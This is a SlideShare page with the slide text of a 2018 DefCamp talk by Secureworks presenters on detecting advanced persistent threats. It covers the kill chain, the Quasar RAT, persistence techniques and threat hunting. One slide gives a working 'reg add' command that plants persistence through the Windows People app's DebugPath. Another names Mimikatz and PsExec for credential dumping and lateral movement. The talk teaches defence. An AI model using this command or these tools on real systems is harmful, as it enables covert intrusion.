SlideShare ist ein Scribd-Unternehmen logo

Catch Me If You Can - Finding APTs in your network

Als PPTX, PDF herunterladen
DefCamp
DefCamp

Adrian Tudor & Leo Neagu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9. The videos and other presentations can be found on https://def.camp/archive

Technologie
1 von 22
Classification: //Secureworks/Public Use:© SecureWorks, Inc. DefCamp Adrian Tudor Leo Neagu November 2018 1 Catch Me If You Can – Finding APTs in your network
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 2 • An Advanced Persistent Threat (APT) is a cyberattack that will “fly under the radar” and your AV/IDS will not let you know about it What is an APT?
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 3 • targeted cyberattack in which an intruder gains access to a network • remains undetected for an extended period of time • traditionally has been associated with nation-state players • in the last few years, the tools and techniques used by a few APT actors have also been adopted by various cybercriminals groups. What is an APT? Key elements of an APT attack - targeted SCADA systems and is believed to be responsible for causing substantial damage to Iran's nuclear program (2010)
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 4 • Focus on • Delivery • Exploitation • Installation • Command and Control • Action and Objectives APT attack mechanism
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 5 APT attack mechanism
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 6 • Vector of compromise APT attack mechanism - Delivery
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 7 Exploitation with malicious links APT Exploitation and Installation
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 8 APT Exploitation and Installation
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 9 Quasar RAT – Easy to use/deploy NetWire malware APT Exploitation and Installation
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 10 Quasar RAT – Easy to use/deploy - Demo APT Exploitation and Installation
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 11 APT Installation
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 12 - Creating services that sound legit - Task schedule - Malware installed as Microsoft Office Add-in. When MS Word starts, malware executed - DLL hijacking - and many more APT Installation – Persistence
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 13 - .bash_profile and .bashrc - Accessibility Features - Account Manipulation - AppCert DLLs - AppInit DLLs - Application Shimming - Authentication Package - BITS Jobs - Bootkit - Browser Extensions - Change Default File Association - Component Firmware - Component Object Model Hijacking - Create Account - DLL Search Order Hijacking - Dylib Hijacking - External Remote Services - File System Permissions Weakness - Hidden Files and Directories - Hooking - Hypervisor - Image File Execution Options Injection - Kernel Modules and Extensions - Launch Agent - Launch Daemon - Launchctl - LC_LOAD_DYLIB Addition - Local Job Scheduling - Login Item - Logon Scripts - LSASS Driver - Modify Existing Service - Netsh Helper DLL - New Service - Office Application Startup - Path Interception - Plist Modification - Port Knocking - Port Monitors - Rc.common - Re-opened Applications - Redundant Access - Registry Run Keys / Startup Folder - Scheduled Task - Screensaver - Security Support Provider - Service Registry Permissions Weakness - Setuid and Setgid - Shortcut Modification - SIP and Trust Provider Hijacking - Startup Items - System Firmware - Time Providers - Trap - Valid Accounts - Web Shell - Windows Management Instrumentation Event Subscription - Winlogon Helper DLL APT Installation – Persistence You can find more detailed information on https://attack.mitre.org
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 14 • PERSISTENCE USING UNIVERSAL WINDOWS PLATFORM APPS (APPX) APT Installation – Persistence
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 15 PERSISTENCE USING UNIVERSAL WINDOWS PLATFORM APPS (APPX) APT Installation – Persistence reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.People_10.1807.2131. 0_x64__8wekyb3d8bbweDebugInformationx4c7a3b7dy2188y46d4ya362y19ac5a580 5e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:UsersIEUserAppDataRoamingSubDirClient.exe" Reference: ODDVAR MOE : https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/ Persistence using the People app
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 16 Moving laterally inside the environment, compromising additional targets and getting closer to high value assets using different tools and techniques: - Enumerate password data from memory using commonly available password dumpers (Mimikatz) - Net.exe to connect to network shares using net use commands with compromised credentials - Spread through the local network by using PsExec - Windows Management Instrumentation (WMI) to interact with local and remote systems APT Lateral movement
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 17 - Recognizing an APT attack early in the kill chain is a tough job - The attackers prefer to work slow blending with regular network activity and using tools already available in the environment (PowerShell, WMI, net.exe etc.) How can I tell I’m targeted?
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 18 - Large outbound network traffic should raise questions, especially if the amount transferred is out of the regular trendline - Quite often APT attacks are detected when the data gathered already has been exfiltrated, sometimes even months later Data exfiltration: to late to detect?
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 19 The reason behind the spike - A web shell present on a IIS server (China Chopper) - A password encrypted RAR archive was exfiltrated - Further analysis of the RAM memory revealed the preparation of the data being exfiltrated
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 20 Are you ready to detect an APT? Assess your current state • Identify your assets • Know your vulnerabilities Know your enemies • Threat Intelligence feeds • Tools, tactics and procedures used by threat actors Design and implement your vision • Multi-layered endpoint & network protection • Threat Hunting
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 21 Let’s go Threat Hunting – look for hidden threats Start the hunt Refine the hunt Response Large unexpected data flows Remote access via RDP Scheduled tasks Phishing campaigns Encoded PowerShell commands Net.exe use
Classification: //Secureworks/Public Use:© SecureWorks, Inc. 22 QUESTIONS? THANK YOU!

Empfohlen

Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
DefCamp
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
Peter Wood
 
Securing your Windows Network with the Microsoft Security Baselines
Securing your Windows Network with the Microsoft Security BaselinesSecuring your Windows Network with the Microsoft Security Baselines
Securing your Windows Network with the Microsoft Security Baselines
Frank Lesniak
 
Industry Best Practice against DDoS Attacks
Industry Best Practice against DDoS AttacksIndustry Best Practice against DDoS Attacks
Industry Best Practice against DDoS Attacks
Marcelo Silva
 
UTM Unified Threat Management
UTM Unified Threat ManagementUTM Unified Threat Management
UTM Unified Threat Management
Lokesh Sharma
 
Sandboxing
SandboxingSandboxing
Sandboxing
Lan & Wan Solutions
 
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Frank Lesniak
 
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Symantec
 

Empfohlen

Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
DefCamp
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
Peter Wood
 
Securing your Windows Network with the Microsoft Security Baselines
Securing your Windows Network with the Microsoft Security BaselinesSecuring your Windows Network with the Microsoft Security Baselines
Securing your Windows Network with the Microsoft Security Baselines
Frank Lesniak
 
Industry Best Practice against DDoS Attacks
Industry Best Practice against DDoS AttacksIndustry Best Practice against DDoS Attacks
Industry Best Practice against DDoS Attacks
Marcelo Silva
 
UTM Unified Threat Management
UTM Unified Threat ManagementUTM Unified Threat Management
UTM Unified Threat Management
Lokesh Sharma
 
Sandboxing
SandboxingSandboxing
Sandboxing
Lan & Wan Solutions
 
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Frank Lesniak
 
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Symantec
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
Sophos Benelux
 
Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers 
Jeff Suratt
 
Tech f43
Tech f43Tech f43
Tech f43
SelectedPresentations
 
Network security
Network securityNetwork security
Network security
Sri Manakula Vinayagar Engineering College
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
NCC Group
 
My Final Year Project
My Final Year ProjectMy Final Year Project
My Final Year Project
MOHAMMEDELALAM1
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
Shah Sheikh
 
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Digital Bond
 
Make Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your FavorMake Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your Favor
David Perkins
 
Thinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and PreventionThinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and Prevention
David Perkins
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
Hishan Shouketh
 
PACE-IT: Network Access Control
PACE-IT: Network Access ControlPACE-IT: Network Access Control
PACE-IT: Network Access Control
Pace IT at Edmonds Community College
 
Vpn
VpnVpn
Vpn
Lan & Wan Solutions
 
VIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS SummitVIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS Summit
Shah Sheikh
 
Check Point designing a security
Check Point designing a securityCheck Point designing a security
Check Point designing a security
Group of company MUK
 
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Quick Heal Technologies Ltd.
 
Chapter 2 Malware and Social Engineering Attacks
Chapter 2 Malware and Social Engineering AttacksChapter 2 Malware and Social Engineering Attacks
Chapter 2 Malware and Social Engineering Attacks
Dr. Ahmed Al Zaidy
 
Forti web
Forti webForti web
Forti web
Lan & Wan Solutions
 
Advanced Threat Protection – ultimátní bezpečnostní řešení
Advanced Threat Protection – ultimátní bezpečnostní řešeníAdvanced Threat Protection – ultimátní bezpečnostní řešení
Advanced Threat Protection – ultimátní bezpečnostní řešení
MarketingArrowECS_CZ
 
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
Digital Bond
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 

Weitere ähnliche Inhalte

Was ist angesagt?

How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
NCC Group
 
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Digital Bond
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
Hishan Shouketh
 
VIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS SummitVIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS Summit
Shah Sheikh
 

Was ist angesagt? (20)

Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
 
Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers 
 
Tech f43
Tech f43Tech f43
Tech f43
 
Network security
Network securityNetwork security
Network security
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
 
My Final Year Project
My Final Year ProjectMy Final Year Project
My Final Year Project
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
 
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
Tiptoe Through The Network: Practical Vulnerability Assessments in Control Sy...
 
Make Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your FavorMake Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your Favor
 
Thinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and PreventionThinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and Prevention
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
 
PACE-IT: Network Access Control
PACE-IT: Network Access ControlPACE-IT: Network Access Control
PACE-IT: Network Access Control
 
Vpn
VpnVpn
Vpn
 
VIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS SummitVIPER Labs - VOIP Security - SANS Summit
VIPER Labs - VOIP Security - SANS Summit
 
Check Point designing a security
Check Point designing a securityCheck Point designing a security
Check Point designing a security
 
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
 
Chapter 2 Malware and Social Engineering Attacks
Chapter 2 Malware and Social Engineering AttacksChapter 2 Malware and Social Engineering Attacks
Chapter 2 Malware and Social Engineering Attacks
 
Forti web
Forti webForti web
Forti web
 
Advanced Threat Protection – ultimátní bezpečnostní řešení
Advanced Threat Protection – ultimátní bezpečnostní řešeníAdvanced Threat Protection – ultimátní bezpečnostní řešení
Advanced Threat Protection – ultimátní bezpečnostní řešení
 
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
Managing and Securing Remote Access To Critical Infrastructure, Yariv Lenchne...
 

Ähnlich wie Catch Me If You Can - Finding APTs in your network

Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
V1_I2_2012_Paper4.doc
V1_I2_2012_Paper4.docV1_I2_2012_Paper4.doc
V1_I2_2012_Paper4.doc
praveena06
 
Detection of Distributed Denial of Service Attacks
Detection of Distributed Denial of Service AttacksDetection of Distributed Denial of Service Attacks
Detection of Distributed Denial of Service Attacks
ijdmtaiir
 
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet KolkataSecurity Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
amiyadutta
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacks
Maarten Van Horenbeeck
 

Ähnlich wie Catch Me If You Can - Finding APTs in your network (20)

Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptx
 
V1_I2_2012_Paper4.doc
V1_I2_2012_Paper4.docV1_I2_2012_Paper4.doc
V1_I2_2012_Paper4.doc
 
Detection of Distributed Denial of Service Attacks
Detection of Distributed Denial of Service AttacksDetection of Distributed Denial of Service Attacks
Detection of Distributed Denial of Service Attacks
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
 
Web Based Security
Web Based SecurityWeb Based Security
Web Based Security
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
Cryptography and system security
Cryptography and system securityCryptography and system security
Cryptography and system security
 
Application Explosion How to Manage Productivity vs Security
Application Explosion How to Manage Productivity vs SecurityApplication Explosion How to Manage Productivity vs Security
Application Explosion How to Manage Productivity vs Security
 
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet KolkataSecurity Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacks
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
 

Mehr von DefCamp

Mehr von DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 

Kürzlich hochgeladen

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Kürzlich hochgeladen (20)

FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
